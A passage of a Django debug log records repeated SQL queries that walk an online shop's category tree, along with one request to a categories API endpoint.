"shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:10:16,919 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:10:16,921 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:10:16,923 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:10:16,925 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:10:16,928 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:10:16,931 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:10:16,933 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:10:16,935 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:10:16,939 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:10:16,943 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:10:16,945 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:10:16,948 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:10:16,951 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:10:16,954 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:10:16,957 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:10:16,961 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:10:16,963 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:10:16,965 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:10:16,968 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:10:16,970 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:10:16,973 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:10:16,975 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:10:16,977 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:10:16,980 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:10:16,982 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:10:16,985 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:10:16,987 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:10:16,990 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:10:16,992 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:10:16,994 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:10:16,996 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:10:16,999 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:10:17,001 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:10:17,003 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:10:17,006 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:10:17,008 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:10:17] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:10:20,588 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:10:20,595 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:10:20,598 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:10:20,601 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:10:20,604 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:10:20,606 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:10:20,608 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:10:20,611 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:10:20,613 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:10:20,616 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:10:20,618 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:10:20,621 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:10:20,623 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:10:20,625 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:10:20,628 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:10:20,631 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:10:20,633 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:10:20,635 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:10:20,637 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:10:20,641 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:10:20,643 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:10:20,645 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:10:20,647 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:10:20,649 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:10:20,652 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:10:20,655 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:10:20,657 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:10:20,659 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:10:20,662 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:10:20,664 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:10:20,671 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:10:20,673 utils 20136 140506422044416 